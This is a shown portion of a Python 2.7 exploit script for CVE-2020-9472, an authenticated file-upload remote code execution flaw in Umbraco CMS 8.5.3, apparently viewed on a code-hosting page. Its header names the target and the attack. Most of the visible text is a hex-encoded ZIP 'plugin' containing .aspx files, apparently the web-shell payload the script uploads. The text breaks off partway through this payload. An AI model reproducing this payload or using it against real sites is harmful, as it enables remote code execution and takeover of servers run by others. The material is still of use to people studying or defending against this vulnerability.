exploit_local.py 34.9 KB
Newer Older
eLeN3Re's avatar
Upload  
eLeN3Re committed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
#!/usr/bin/python

# Exploit Title: Umbraco CMS - Remote Code Execution
# Date: 2020-02-22
# Tested on: Umbraco CMS 8.5.3
# Authors: Miguel Haro and Luis Nunez Rincon
# CVE : CVE-2020-9472
# Exploit written in Python 2.7
# Authenticated Arbitrary FileUpload + Remote Code Execution

import requests
import sys
import urllib3,urllib
import json
import random
import string
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def zippedPlugin():
    plugin = '\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xa4\xad\x4d\x50\x00\x00\x00\x00\x00\x00'
    plugin += '\x00\x00\x00\x00\x00\x00\x25\x00\x20\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33'
    plugin += '\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66'
    plugin += '\x61\x66\x30\x35\x32\x35\x2f\x55\x54\x0d\x00\x07\x65\xc3\x45\x5e\x65\xc3\x45\x5e'
    plugin += '\x65\xc3\x45\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50'
    plugin += '\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x23\x9c\x4b\x50\xb3\x1b\xf5\x0d\x81\x02\x00'
    plugin += '\x00\x15\x05\x00\x00\x2f\x00\x20\x00\x63\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64'
    plugin += '\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61'
    plugin += '\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d\x73\x2e\x61\x73\x70\x78\x55\x54\x0d\x00'
    plugin += '\x07\x73\x01\x43\x5e\x6f\xc3\x45\x5e\xd1\x01\x43\x5e\x75\x78\x0b\x00\x01\x04\xe8'
    plugin += '\x03\x00\x00\x04\xe8\x03\x00\x00\x8d\x93\x6f\x6f\xda\x30\x10\xc6\xdf\x23\xf1\x1d'
    plugin += '\x4e\x9e\x2a\x81\xb6\x85\x3f\x5d\xb7\x09\x02\x5a\x0b\xa9\x8a\xc4\x0a\x2a\x99\x3a'
    plugin += '\xed\x4d\x65\x92\x2b\xcd\x96\xd8\x91\xed\xb0\x54\xd3\xbe\xfb\xce\x4e\x60\x1d\x45'
    plugin += '\xd5\xc4\x8b\xd8\xbe\xe7\x7c\x3f\xdf\x73\xf8\x27\x9f\x60\xc9\x37\x08\x73\x2e\x36'
    plugin += '\x05\x2d\x46\x6c\xf2\x8a\xc1\x14\xd7\xc5\x66\xc4\x8c\x2a\x90\x41\xa8\x78\x44\xe7'
    plugin += '\xf7\x3c\xd5\xb4\x3b\x19\x37\x1b\x3e\x65\xcd\xb2\x5c\x2a\x03\xd7\x3c\x43\x9d\x3b'
    plugin += '\xc1\xea\x51\x1b\xcc\xbc\x69\xc2\x37\x42\x6a\x93\x44\xfa\x3f\xd4\xb3\x45\x2d\xd2'
    plugin += '\x91\x4a\x72\xf3\x84\x23\x22\x0e\x55\x08\x6e\x46\x4c\xa3\xda\xa2\x62\x24\xdb\xca'
    plugin += '\x24\x76\xc0\x77\x73\xc9\xe3\x96\x5c\x7f\xc7\xc8\x80\x46\x11\xa3\x7a\x03\xc1\x16'
    plugin += '\x85\x39\x57\x1b\x0d\xd8\x6e\x36\x7e\x35\x1b\xbf\x9b\x0d\x6d\x54\x22\x36\x10\x94'
    plugin += '\x51\x61\x70\x92\xc5\xad\xfa\x80\xab\x4d\xa5\x59\x2a\x19\xa1\xd6\x2b\xc3\x95\x99'
    plugin += '\x89\x7b\x09\xb9\x4e\x60\x04\x02\x7f\xc2\x61\xa8\xd5\x1e\x36\x1b\x14\xf6\x2e\x93'
    plugin += '\x14\xed\x5b\x48\xc7\xa2\x2c\xf6\xb0\x44\x56\x87\xa8\x7c\x91\x11\x86\xb6\xb1\x4e'
    plugin += '\x04\xec\x35\x55\xaa\x63\x37\x18\x27\x8a\x80\xe9\x42\x11\x73\x15\x2f\x0a\x93\x17'
    plugin += '\x86\x84\xb6\xd1\xb5\xe6\x8b\xc6\xd5\x03\xa6\x69\x50\xa2\x25\xa6\xa0\x6b\xfc\x70'
    plugin += '\x0f\x0a\x39\x9d\xd5\x6b\xcf\xa1\xb5\x28\xcf\x92\xad\x8c\x42\x9e\xdd\x20\xa7\x66'
    plugin += '\x80\x36\x99\x8a\x15\x49\x73\xef\xdf\x72\xc3\x7d\x4f\x2c\x62\x25\xf3\x6c\x52\x28'
    plugin += '\x03\x11\xbb\x27\xd6\x87\x93\x54\x6a\x74\x07\x0a\x4d\xa1\x04\xe8\xa1\x6b\xa9\x33'
    plugin += '\x81\x9e\x4d\x88\x77\x93\x34\x89\x7e\x1c\xfa\x50\x7b\xfb\xcc\x8e\x1b\x32\x5f\x0a'
    plugin += '\x8d\xde\xad\x4a\x0c\xb6\x98\x9f\x2b\x1c\x33\x5b\xe0\x20\xb2\x72\x86\x7b\x57\x26'
    plugin += '\x4b\x03\x11\xc9\x18\x5b\x7f\xfd\x33\xa5\xbd\xd3\x0b\xb1\x34\xed\xf6\x91\x5c\xe6'
    plugin += '\x77\xf6\xd7\x12\xac\xdf\xa9\x26\xcb\xce\xd8\x55\xf8\x79\xee\xbe\xc1\xf9\xd4\x7e'
    plugin += '\x4d\x62\x52\x1c\xdf\x4b\x95\x69\xbf\x53\x6d\x6c\xc2\x2e\xbc\x96\xf1\x23\xd8\x85'
    plugin += '\x55\x40\x12\x8f\xac\xd7\x0c\x32\x34\x0f\x92\x36\x39\x0d\xf9\x91\x11\xf5\xb9\xce'
    plugin += '\x07\x96\xee\x42\x96\x2e\xa9\x02\x66\xd4\xea\xc7\x94\xe6\xfa\xdb\xdb\xd9\xf5\x34'
    plugin += '\xf8\x3a\x80\x5e\xb7\x37\x84\x79\x70\x19\x0e\xe0\x5d\xf7\x2c\x2f\x87\xb0\x5c\xac'
    plugin += '\x66\xe1\x6c\x71\x3d\x00\xbe\xd6\x32\xa5\x07\x0f\x21\x5c\x2c\x07\xd0\xef\xe6\xe5'
    plugin += '\x61\x29\xb8\x4d\x62\xf3\x30\x62\xfd\x33\x1b\x1c\xfb\x9d\x27\x75\x77\x18\x17\x85'
    plugin += '\x31\x52\x54\x14\x48\x7f\x49\x71\x14\xa3\xbf\xc3\x78\xff\xe1\x65\x8c\xde\xc7\x23'
    plugin += '\x18\xb6\xe4\x88\x61\x35\xae\x0c\x16\xc2\x8d\x84\xeb\xd5\x7e\x40\x76\x78\x15\xcf'
    plugin += '\x8e\x6e\xce\xd7\x98\x3a\xb8\x74\x9d\xda\x6b\x8e\xc1\x9d\xee\xe0\x4e\x7b\xdd\x97'
    plugin += '\x7b\xd4\x7f\x0e\x37\x9e\xc8\x2c\xa3\xe1\x1f\x54\xe5\x5d\x41\x67\xb1\x75\xd4\x2d'
    plugin += '\xac\xc7\x95\xe9\xd5\x6c\xd8\xdf\x1f\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xd7'
    plugin += '\x9c\x4b\x50\x54\x54\x32\x42\x7a\x03\x00\x00\x72\x0f\x00\x00\x30\x00\x20\x00\x63'
    plugin += '\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36'
    plugin += '\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d'
    plugin += '\x73\x74\x2e\x61\x73\x70\x78\x55\x54\x0d\x00\x07\xc6\x02\x43\x5e\x6f\xc3\x45\x5e'
    plugin += '\xc6\x02\x43\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\xed'
    plugin += '\x57\xcd\x4e\xdb\x40\x10\xbe\x57\xe2\x1d\x56\xae\x10\xb6\x94\x3a\xb4\x52\x4f\x6d'
    plugin += '\x50\x43\x08\x34\x02\x12\xd7\x36\xa2\x12\xe2\xb0\x38\x93\x60\xe1\xec\xba\xbb\x9b'
    plugin += '\x82\x55\xf1\x64\x3d\xf4\x91\xfa\x0a\x9d\xb5\x9d\x5f\xbc\xf9\x81\x4b\x55\x75\x2e'
    plugin += '\x71\x76\xe7\xe7\x9b\x99\x6f\x26\xce\xef\x9f\xbf\x3e\xee\x7e\x22\x1e\x1d\x02\x39'
    plugin += '\xa3\x6c\x38\xc6\x87\x86\xd5\x7a\x6d\x91\x36\xa3\x37\x09\x04\x20\x65\xcc\x59\xa0'
    plugin += '\xa8\xc2\xf3\x50\x8c\xc1\xda\x3d\xd8\x79\xa5\x6d\x3a\xa3\x94\x0b\x45\xba\x74\x04'
    plugin += '\x32\xa5\x11\x5e\x07\x99\x54\x30\x72\xbb\xa0\x2c\xb2\x89\x96\x1b\xf0\xe8\x0e\x94'
    plugin += '\x9c\x68\xef\xbc\x22\x28\x4a\x64\xc5\xc3\x8f\xe2\x43\x4b\x3c\x20\xb6\x0f\xdf\xc6'
    plugin += '\x20\x95\xfb\x59\xa9\xf4\x1c\xd4\x2d\xef\x93\x46\x83\x58\x5e\x2f\x08\x2d\x67\xa6'
    plugin += '\x3a\x67\xa5\xa5\x5e\x0f\x94\x88\xd9\x90\x44\x23\xd4\x27\x53\x27\x40\xfb\x20\xa4'
    plugin += '\x7b\x02\xca\xb6\xbe\xbe\x69\x9d\x1f\x59\xce\x87\x45\xcb\x4a\xbb\x2f\x63\x10\x59'
    plugin += '\x71\x53\xd8\xe2\xb5\xe5\xb8\x21\xbf\x48\x53\x10\xf6\xb2\x0f\x8d\x3b\x77\x80\x40'
    plugin += '\x5b\xbd\x6e\xb7\xdd\x5a\xc0\x5a\x81\x77\xa1\x02\x6b\xf4\xe6\x50\x2a\x2a\x86\xa0'
    plugin += '\x56\x01\x2d\x34\x56\x60\x9d\x55\xcc\x50\xa4\xb0\xe9\x9f\xb4\xc3\x27\x75\x9a\xe6'
    plugin += '\xca\x14\xc9\x7b\xdd\xd0\x8f\xae\x47\x85\x04\xdb\x08\x47\x6b\x5a\xce\xd6\x18\xbc'
    plugin += '\x9e\x1f\x9a\xcd\x3a\x5e\xb3\xdf\x17\x48\x59\x12\xa7\x08\x63\xfa\xb5\x04\x53\x94'
    plugin += '\xc0\x64\x3c\xc7\xcb\x8e\xd7\x66\x7d\x8f\xeb\x8c\x04\x8c\xb8\x82\xb6\x87\xee\x18'
    plugin += '\xdc\x93\xd9\x8d\x1d\xa7\xb5\x3c\x5f\xa3\xbf\x9c\xdc\x44\x02\xc3\x04\x4a\xf3\xe2'
    plugin += '\xcc\x2e\x61\x1d\xd3\x51\x9c\x64\x6e\x87\x29\x10\x18\xf6\x9e\x8b\xbb\x5a\xa9\x12'
    plugin += '\x66\x29\xb8\x58\x2f\xa0\xa3\x1a\xf1\x04\x57\x3c\xe2\x49\x7e\x18\x46\xa9\x29\x62'
    plugin += '\x11\xca\x6d\x71\xc6\x20\x52\xf6\x04\xfa\x1a\xf5\xc3\x04\x23\x6a\x0e\x35\xc8\x80'
    plugin += '\x26\x12\x4c\xe9\x14\x9b\xc0\x45\xec\xb6\x25\x73\x90\x56\xad\xf4\x61\x8a\xe0\xe3'
    plugin += '\xcc\x73\x26\x41\x1b\x15\x8d\xd4\x3d\x0c\xc2\x66\x78\x11\xa0\xb1\xd5\x3b\xad\x64'
    plugin += '\xd3\xe3\xd3\xa3\x88\xaa\xe8\x96\xd8\xed\x87\x08\x52\x85\x30\x08\x3c\x38\x1b\xcf'
    plugin += '\x48\x35\x8c\xb6\xef\xf7\x7c\x44\x01\x0f\xee\x39\xe6\x86\x8b\xef\xb9\x69\x1c\x37'
    plugin += '\x3b\x67\x9b\x24\xb2\xf4\x15\xb0\xd8\x0b\x1b\xe2\xa8\x13\x6c\xb5\x24\x8c\x3b\xa1'
    plugin += '\x64\x1e\x76\xd4\x2e\x9e\x9d\xb2\x7b\x57\x93\xce\x5d\x9b\x38\xe1\xb6\x12\x8e\xa3'
    plugin += '\x52\x99\x4d\x65\x17\x10\xc3\x46\x1d\x9c\xf2\xe7\x86\xb2\x3e\x67\x95\x11\x9e\xc1'
    plugin += '\x97\x75\x35\x3d\xee\xf9\x97\x4d\xff\x68\x83\x82\x3e\xb3\x6a\xdb\x2c\x6b\xbd\x50'
    plugin += '\x6e\xc6\x83\xc1\x19\xb0\xb9\x55\x8d\xf3\xaa\x80\x29\x3c\x1c\xaa\x5b\x43\x5f\x6e'
    plugin += '\x32\x05\x57\xd7\xb9\x71\xb9\x4a\xf2\x93\xd2\x99\xa9\x9b\x3a\x5e\x84\xfa\xfb\x86'
    plugin += '\xfb\xfb\xdb\x38\x01\x62\xdb\xd1\x1c\x9a\x0e\x4b\xc7\xaa\xd8\x3c\xae\x8f\x3d\xb0'
    plugin += '\x75\x8c\x1a\xd9\xaf\xe5\xc1\xdd\x02\xa5\xe3\x90\x03\xb2\x5f\x31\x81\x2b\x92\xd7'
    plugin += '\x22\xdd\x00\x17\x46\xee\xd2\x34\x6c\x15\xd4\xd1\xf2\x7f\x95\x6c\x45\x7b\xbf\xdd'
    plugin += '\xfc\x8b\x38\xbf\x8a\x83\x25\xb3\x91\x6f\xfd\xc3\x25\x76\xbf\x7f\xfb\xce\xc4\xec'
    plugin += '\x4a\x04\x2b\x50\x68\x99\x67\xbb\x44\x6e\x47\x10\x7f\x07\x7b\x12\x78\x25\xa5\xd7'
    plugin += '\x78\x9e\xcb\x03\xc1\x2f\xa7\x11\x99\x92\x98\x48\xbd\xde\x14\x82\x66\x7a\x11\x48'
    plugin += '\x25\x68\xcc\xa0\xdf\xe2\x69\x36\x85\x96\x4f\x5f\xe9\x38\x7f\x8e\x4c\xf4\x9a\x48'
    plugin += '\xf9\x2e\xa3\x0d\x26\xbf\xf0\x2f\xf4\x38\x25\xee\x61\xcc\xa8\xc8\x2e\x45\xac\xc0'
    plugin += '\x2e\x3d\xac\xb2\x35\x8c\xf3\x82\xcb\xed\x46\x3a\xf7\x5a\x75\x58\xad\x5a\x8e\x7b'
    plugin += '\xc1\xee\xd9\xd0\x4b\x5e\x39\xf6\x5a\x56\x34\xfa\x05\x90\xb5\x08\x50\x63\xc1\x36'
    plugin += '\x5f\x7c\xff\xec\xf6\x9a\xeb\xd5\x63\xb1\xbc\x96\x10\x4f\x23\x15\x44\xb3\x4e\x80'
    plugin += '\x8b\x21\x91\x34\x93\x35\xb2\xd7\x4c\x12\x7c\xf1\x84\x91\x24\x03\x9c\x95\xbd\x85'
    plugin += '\x88\x65\xa4\xf2\xa3\xa2\x5a\xa7\xf4\xce\x79\xf2\xff\x72\x5d\x61\xd0\xa8\xaa\x36'
    plugin += '\x5b\xd5\x03\x21\xe9\xbf\xb9\x7f\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\x96'
    plugin += '\xad\x4d\x50\x30\x5b\x39\xd8\x71\x06\x00\x00\x58\x1b\x00\x00\x30\x00\x20\x00\x63'
    plugin += '\x64\x34\x34\x63\x66\x33\x39\x2d\x33\x64\x37\x31\x2d\x34\x63\x31\x39\x2d\x62\x36'
    plugin += '\x65\x65\x2d\x39\x34\x38\x65\x31\x66\x61\x66\x30\x35\x32\x35\x2f\x66\x6f\x72\x6d'
    plugin += '\x73\x62\x2e\x61\x73\x70\x78\x55\x54\x0d\x00\x07\x4d\xc3\x45\x5e\x66\xc3\x45\x5e'
    plugin += '\x65\xc3\x45\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\xbd'
    plugin += '\x59\x6d\x73\xda\x38\x10\xfe\xdc\xfc\x8a\xad\x6e\xda\x81\x36\xd8\xed\xf4\x4b\x27'
    plugin += '\x18\xee\xd2\x40\x2e\x99\xd2\x26\x93\xd2\xe9\x75\x4a\xe7\x46\xc1\x02\x7c\x31\xb2'
    plugin += '\x4f\x12\x09\x5c\x26\xff\xfd\x56\x92\x6d\x30\x36\xe0\x26\x69\x35\x53\x62\x59\xfb'
    plugin += '\xa6\x7d\x76\x57\x2b\xd7\x7b\xf6\x07\x9c\xd3\x31\x83\x1e\xe5\xe3\x19\x3e\xb4\xc8'
    plugin += '\xd1\x6f\x04\x9e\xb5\xf7\x3c\x5c\x39\x9d\xc6\x91\x50\xc0\xe9\x94\xc9\x98\x0e\x71'
    plugin += '\xf1\xd3\x42\x2a\x36\x75\x3a\x01\x1d\xf3\x48\xaa\x60\x28\x49\x9e\xf6\x63\x81\xf6'
    plugin += '\xf4\x6c\x5d\x5e\x91\xa6\xcf\xe6\xca\x50\xed\x79\x4f\x3b\x67\x47\xfd\xaf\xe7\x5d'
    plugin += '\x98\xa8\x69\x08\xe7\x9f\xdf\xf5\x4e\x8f\x80\x34\x5c\xf7\xcb\x9b\x23\xd7\xed\xf4'
    plugin += '\x3b\xf0\xd7\x49\xff\x43\x0f\x5e\x3b\xaf\xa0\x2f\x28\x97\x81\x0a\x22\x4e\x43\xd7'
    plugin += '\xed\x7e\x24\x40\x26\x4a\xc5\x07\xae\x7b\x73\x73\xe3\xdc\xbc\x71\x22\x31\x76\xfb'
    plugin += '\x17\xee\x5c\xcb\x7a\xad\x99\x93\xc7\x86\x5a\xe1\x74\x7c\xe5\x13\xad\x5a\x0e\x45'
    plugin += '\x10\x2b\x08\x33\x57\x0c\xd1\x15\x62\xc6\xa9\x6a\x11\xc9\xc4\x35\x13\x48\x06\x38'
    plugin += '\x62\x11\x5c\x53\xc5\x60\x18\x71\xa9\x40\x2a\x11\xf0\x31\x1c\x7e\xee\x9f\xbc\xef'
    plugin += '\x7e\x85\x16\x90\xab\x2b\xd2\xdc\x4c\x78\xd2\x3d\xec\x74\x2f\x34\x9d\xa7\x8d\x69'
    plugin += '\x0f\xb8\x37\x61\xd4\xd7\x7f\x55\xa0\x42\xd6\x1e\x05\x21\x93\xc6\x31\x97\x22\xba'
    plugin += '\x41\xcd\x9e\x6b\x17\x90\x42\xaa\x45\xc8\x40\x2d\x62\xd6\x1a\x10\x85\x6e\x73\x87'
    plugin += '\x52\x0e\x48\xdb\x7b\xda\x68\x0c\xf8\x65\xe4\x2f\xf6\x15\xbd\x0c\xd9\x7e\xbc\x1f'
    plugin += '\x0b\xb6\x3f\x8a\xc4\x14\x02\x1e\xcf\x94\x7d\x94\x2c\x64\x43\x05\xb7\x03\x0e\xa3'
    plugin += '\x88\xab\xc6\x88\x4e\x83\x70\x71\x00\x03\xd2\x9b\x0d\x03\x9f\xc2\x11\x5a\x1a\x85'
    plugin += '\x6c\x40\xf6\x61\x1a\x21\xc4\x1a\xa6\x66\x4a\x2d\x83\xff\xd8\x01\xbc\x7d\xfb\x0c'
    plugin += '\xdf\xdc\x0d\x78\xa3\xa1\x2d\x72\x8d\x49\x6d\xcf\x4d\x37\xa1\x8d\xc0\xbf\xdb\x5c'
    plugin += '\x70\x7c\x76\xd6\x4f\x5c\xe0\x26\xe4\xc8\x6f\x9d\x91\xf0\x99\x1f\xd7\x75\xc1\x93'
    plugin += '\xb3\xe9\x94\x8a\x45\x3b\x7b\xb3\x5c\x72\x0b\x6b\x5e\x4c\x05\x9d\x9a\x90\xd5\xa0'
    plugin += '\x71\x5f\x83\xe6\xb9\xe6\xed\x06\x2a\x56\x46\xf0\xab\x95\xc6\x22\x52\x88\x0c\xf3'
    plugin += '\xe1\x3a\x0a\x7c\x93\x93\x7f\xf7\x22\xea\xd7\xa2\xcb\x7f\x34\x62\x56\xea\x3e\x74'
    plugin += '\xaf\x19\x57\x87\x62\x2c\x81\xd5\x0d\xe3\xad\xf9\xd5\x43\x89\x45\xf6\x7c\xbb\xf7'
    plugin += '\x24\x7d\x0c\x46\x50\xbb\x60\xff\xce\x98\x54\xce\xb9\x56\x28\xbf\x11\x3a\x53\x93'
    plugin += '\x2b\xb6\x20\xdf\xa1\xd5\x02\x3e\x0b\xc3\x7a\xc6\x99\x97\xa9\xc7\x13\xc1\xd4\x4c'
    plugin += '\xf0\x66\xee\xe5\x5d\x6e\x96\x9b\x6c\x57\xf8\xb4\x95\x66\x4a\x7d\x69\xe3\x8a\xb9'
    plugin += '\x7a\x3c\x82\xc2\x28\x66\x82\xea\xfc\xb6\x2a\x77\xed\xb1\x8a\x18\x74\x15\xf1\xa3'
    plugin += '\x1b\x1e\x22\x2c\xa4\x5e\x60\x2f\x0a\xd4\xe3\x02\x2b\x1d\x46\x3e\x73\xbe\x88\x40'
    plugin += '\xb1\x9a\xcd\xfd\x7a\xb3\x0a\xad\x9a\x04\xd2\xe9\x24\x0a\x8f\xb1\x26\xd4\xea\xd5'
    plugin += '\x18\x6d\x76\x95\xd0\xde\x15\xde\xb0\x50\xb2\x4a\x1b\x0f\x03\xa9\x7e\xd9\xa6\xcf'
    plugin += '\x66\x0a\x2b\x56\x0f\x55\xfe\xa4\x2d\xff\xfc\x7d\x90\xcf\xfc\x8a\x23\x76\xb0\x74'
    plugin += '\xe4\xa3\xee\x24\x3f\x2b\xec\xa9\xb8\x9f\xaa\x7b\xb9\x07\x1e\x55\x76\xb0\xb4\x77'
    plugin += '\xf9\x34\xa4\x6a\x38\x81\x5a\x77\x3e\x64\xb1\xf6\x10\xb0\xf9\x32\xc2\xf2\x3b\xa8'
    plugin += '\x62\xfd\x1a\x0d\x9b\x3b\x1f\x98\x94\x58\x48\xb7\xd3\x15\xcc\xb5\x06\xde\xed\xdd'
    plugin += '\xe3\x30\x48\x0f\xbb\xe4\x98\xcb\x27\xef\xd6\x72\xbd\x6a\x60\x59\x3e\xea\x9e\xa0'
    plugin += '\x5a\xb9\xd6\xc3\x16\x50\x20\x1f\x23\xd0\x8c\x20\x67\x71\x1c\x06\xcc\x27\xeb\xa0'
    plugin += '\xe4\xa6\x89\xd5\x86\xa3\x05\xe5\x16\x34\xf7\x0a\xa6\xea\xdd\x39\xdd\x39\x46\x87'
    plugin += '\xac\x69\xa2\xba\xb6\x72\x44\x31\x24\xab\x9a\xa9\x25\x80\x1f\x31\x09\x3c\x52\x18'
    plugin += '\x05\xba\xd6\x6c\xb5\x34\x83\xf0\x28\x64\x54\x60\xcf\xa2\xf0\x54\xac\x6d\xc2\xd9'
    plugin += '\x10\x9d\x60\x77\xc2\x84\xdc\x4e\xb4\x79\xd5\xaa\xe8\x63\xdf\xa5\xbb\x16\xaa\xdd'
    plugin += '\x39\x34\x69\xed\x46\x78\x6a\x63\x6b\xa4\x04\xa3\x53\xb2\x81\xfd\xd0\xf7\xad\xfe'
    plugin += '\x1a\x49\x24\x35\x3a\x01\xae\xd9\x16\x14\x7b\x2d\x42\x95\xa2\xc3\xc9\x14\x57\x9a'
    plugin += '\x06\x00\xdb\x25\xc0\x4b\xec\x04\xd4\xc4\xf9\x93\x29\xed\x23\xdd\x38\x5b\x17\x6f'
    plugin += '\xb2\xb3\x44\x51\x8f\xf1\xb1\x9a\xa0\x0e\xce\x6e\x40\x4b\x39\xe5\xa3\xc8\x4a\x71'
    plugin += '\xec\x9a\xd3\x8f\x3e\x19\xe8\x0b\xd9\x9d\x4f\x15\x13\xc6\x86\x71\x03\xd5\x71\x38'
    plugin += '\x93\x93\x2d\x1e\x8e\x24\xd3\xab\xb9\xe5\xb5\x18\xb0\x09\x93\x8b\xd4\x7b\x15\x8c'
    plugin += '\x44\x2c\x16\x81\xe5\xe6\x7e\x46\x8a\xaf\x96\xc6\xca\x09\x6e\x0d\x7a\x37\x0b\x42'
    plugin += '\x44\x0a\x4d\xb5\x0e\xc2\xc0\xd2\x10\xe5\x16\x0b\xee\x4a\xd4\xfa\x81\x40\x72\x3b'
    plugin += '\x71\xba\xd3\x58\x2d\x4a\x12\x73\x3d\x83\x91\x09\x5b\xc9\x48\x54\xec\xfb\x96\xea'
    plugin += '\xbe\x7d\x07\xbc\x8c\xc4\x1d\xdc\x3a\xe6\x68\x0b\xba\xfc\x3a\x10\x11\xd7\xd1\xaa'
    plugin += '\x43\xb3\x17\x8d\x31\x19\x42\xbb\xbc\x0e\x7f\x6a\xcc\x52\x40\x12\x75\xd0\x86\x57'
    plugin += '\x55\x1b\x0a\xbc\xbb\x40\x2d\xe0\x0a\xaf\x32\x3e\x9b\xa3\x05\xaf\x9a\xc9\xa3\x07'
    plugin += '\x05\xc1\xc9\xd2\xcb\x97\x45\xe9\x9b\x35\xe8\xb1\x0a\x58\x75\x2e\x3d\x2c\x1c\x4b'
    plugin += '\x4b\xbe\x19\x0b\xbe\x97\x1f\xf8\xe9\xb8\xc4\x8a\x71\xb5\x99\xa4\xd8\xb9\xa4\x23'
    plugin += '\x49\x83\xd3\xb3\x2c\x11\xea\xb7\xe5\xd4\xc5\xb7\x0f\xec\x22\xec\x46\xb7\x04\xd6'
    plugin += '\xd6\xb2\xad\xe3\xa0\x93\xd2\xa6\x47\x06\x32\xff\xf8\x89\x91\x49\xd9\x75\x6c\xac'
    plugin += '\xce\x72\x13\xcc\x6c\x9b\xbb\xa0\x26\x0c\xf4\xfd\x04\xf0\x82\x02\xfa\x4a\x7d\x19'
    plugin += '\xcd\xd7\x6a\x49\x5a\x5d\xe3\x18\xaf\x61\x35\xe2\x99\x2b\x76\xdb\x53\xa2\xbd\xde'
    plugin += '\xd5\xad\xd3\xfe\x81\xc4\x7e\xdb\xa3\x32\x3e\xd0\x1f\x39\xde\x45\x73\x08\xfc\x16'
    plugin += '\x21\x6a\xae\x0e\x51\xe7\x7b\xbc\x13\x65\xdf\x18\xd2\x8f\x0c\xfa\x6a\xb8\xc2\x80'
    plugin += '\x33\x14\xb1\x4b\x11\xde\xa4\xd1\x1c\xcf\xfc\xf3\xdb\xcf\xf9\xa5\x8c\x9b\x46\xb5'
    plugin += '\x79\xed\x5a\x8b\xc9\x7a\x39\x59\xf3\xc2\x35\x0d\x42\x4d\x08\xbe\x09\xe3\x47\xf3'
    plugin += '\x82\x71\x82\x4d\x8d\x6c\x33\x25\x65\x0d\xeb\x8c\x7f\x9f\x1a\x83\xe5\x81\x51\x9d'
    plugin += '\x12\x69\x75\xd4\x54\x58\x05\x12\x69\xbb\x83\xaa\xc4\x5a\x8f\xc2\x44\xb0\x51\xab'
    plugin += '\xac\x6d\x2f\x30\xfc\x9e\x65\x40\x25\x7a\x63\x56\x15\xb9\xcf\x93\x7b\xb3\xe9\x04'
    plugin += '\x36\xde\xa9\x2b\x49\xca\xee\x21\x2d\x7d\x95\x2b\x20\xf6\x20\x33\x31\x5c\xcb\x83'
    plugin += '\xf4\x6e\x5b\xb4\x0d\x67\x42\x20\xba\x10\x63\x87\x53\x25\xb4\xdd\x34\xde\xb2\xb0'
    plugin += '\x5b\x89\x74\x37\x0d\xf5\x0a\xa1\x68\x19\x1d\xc7\xb2\xae\xfe\xa6\xa0\x0f\xd6\x11'
    plugin += '\x2d\x3b\x83\x63\x6a\xcc\x6f\xe9\xa2\x98\xd7\x99\x55\x27\xdd\x6a\x25\x74\xf8\xce'
    plugin += '\xcc\x5a\xcb\x55\x1d\xd7\xe7\x66\xd1\x14\xc1\x66\xa1\x56\xe6\x39\x2b\x7e\xc6\xc8'
    plugin += '\xcc\xca\x71\x3b\xc7\xc8\xaa\xfb\xc7\xad\x00\xad\x3b\xcb\x8a\xd8\xe5\xd1\x7b\x45'
    plugin += '\xe9\xae\x08\x1d\x90\x9d\x50\x56\xb3\x2e\x0b\xce\xb2\x28\xda\x51\x10\xd3\x20\x08'
    plugin += '\xd6\x6a\x61\xf6\x69\xdb\xc9\x43\xed\x67\x20\x9b\x4e\xae\x9c\xaa\x04\xec\xac\x80'
    plugin += '\x6d\x11\x2c\x4d\x41\x4b\xd0\xc4\xc8\xe9\x2c\x6d\xab\x91\x17\xce\x0b\x52\xbf\x47'
    plugin += '\x9d\xb3\xa9\x80\x52\x77\x67\x01\x62\xab\xad\xc8\x02\x09\xe7\x15\x91\x37\x94\x45'
